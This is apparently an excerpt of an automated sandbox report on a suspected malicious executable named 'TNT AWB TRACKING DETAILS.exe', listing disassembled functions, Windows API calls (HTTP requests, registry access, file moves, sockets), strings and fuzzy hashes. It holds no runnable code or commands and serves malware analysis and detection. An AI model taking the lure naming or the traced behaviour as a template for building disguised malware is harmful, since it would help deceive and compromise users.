                                      • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                      • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                      • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                      • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                      APIs
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,0040F545,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,004A90E8,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,?,0040F545), ref: 0041013C
                                        • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                      • MoveFileW.KERNEL32(?,?), ref: 00453932
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                      • String ID:
                                      • API String ID: 978794511-0
                                      • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                      • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                      • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                      • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                      Similarity
                                      • API ID: _memmove$_memcmp
                                      • String ID: '$\$h
                                      • API String ID: 2205784470-1303700344
                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                      • __swprintf.LIBCMT ref: 0045EC33
                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                      Strings
                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                      Similarity
                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                      • String ID: %4d%02d%02d%02d%02d%02d
                                      • API String ID: 2441338619-1568723262
                                      • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                      • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                      APIs
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                      Similarity
                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                      • String ID: @COM_EVENTOBJ
                                      • API String ID: 327565842-2228938565
                                      • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                      • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                      APIs
                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                      Similarity
                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                      • String ID: H
                                      • API String ID: 3613100350-2852464175
                                      • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                      • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                      • DestroyWindow.USER32(?), ref: 00426F50
                                      • UnregisterHotKey.USER32(?), ref: 00426F77
                                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 4174999648-3243417748
                                      • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                      • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Similarity
                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 1291720006-3916222277
                                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                      APIs
                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                      • IsMenu.USER32(?), ref: 0045FC5F
                                      • CreatePopupMenu.USER32 ref: 0045FC97
                                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                      Similarity
                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                      • String ID: 0$2
                                      • API String ID: 93392585-3793063076
                                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                      APIs
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                      Similarity
                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                      • String ID: crts
                                      • API String ID: 586820018-3724388283
                                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                      APIs
                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,0040F545,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,004A90E8,C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe,?,0040F545), ref: 0041013C
                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                      • _wcscat.LIBCMT ref: 0044BCAF
                                      • _wcslen.LIBCMT ref: 0044BCBB
                                      • _wcslen.LIBCMT ref: 0044BCD1
                                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                      Similarity
                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 2326526234-1173974218
                                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                      APIs
                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                      • _wcslen.LIBCMT ref: 004335F2
                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                      • GetLastError.KERNEL32 ref: 0043362B
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                      • _wcsrchr.LIBCMT ref: 00433666
                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                      • String ID: \
                                      • API String ID: 321622961-2967466578
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                      • __lock.LIBCMT ref: 00417981
                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                      • __lock.LIBCMT ref: 004179A2
                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL$pI
                                      • API String ID: 637971194-197072765
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove$_malloc
                                      • String ID:
                                      • API String ID: 1938898002-0
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                      • _memmove.LIBCMT ref: 0044B555
                                      • _memmove.LIBCMT ref: 0044B578
                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                      • String ID:
                                      • API String ID: 2737351978-0
                                      APIs
                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                      • __calloc_crt.LIBCMT ref: 00415246
                                      • __getptd.LIBCMT ref: 00415253
                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                      • _free.LIBCMT ref: 0041529E
                                      • __dosmaperr.LIBCMT ref: 004152A9
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                      • String ID:
                                      • API String ID: 3638380555-0
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$ClearErrorInitLast
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 3207048006-625585964
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                      • _memmove.LIBCMT ref: 004656CA
                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                      • WSACleanup.WSOCK32 ref: 00465762
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                      • String ID:
                                      • API String ID: 2945290962-0
                                      APIs
                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                      • String ID:
                                      • API String ID: 1457242333-0
                                      APIs
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ConnectRegistry_memmove_wcslen
                                      • String ID:
                                      • API String ID: 15295421-0
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcstok.LIBCMT ref: 004675B2
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcscpy.LIBCMT ref: 00467641
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcslen.LIBCMT ref: 004677BD
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                      • String ID: X
                                      • API String ID: 780548581-3081909835
                                      APIs
                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                      • CloseFigure.GDI32(?), ref: 0044751F
                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                      • String ID:
                                      • API String ID: 4082120231-0
                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                      • String ID:
                                      • API String ID: 2027346449-0
                                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                      APIs
                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                      • GetMenu.USER32 ref: 0047A703
                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                      • _wcslen.LIBCMT ref: 0047A79E
                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
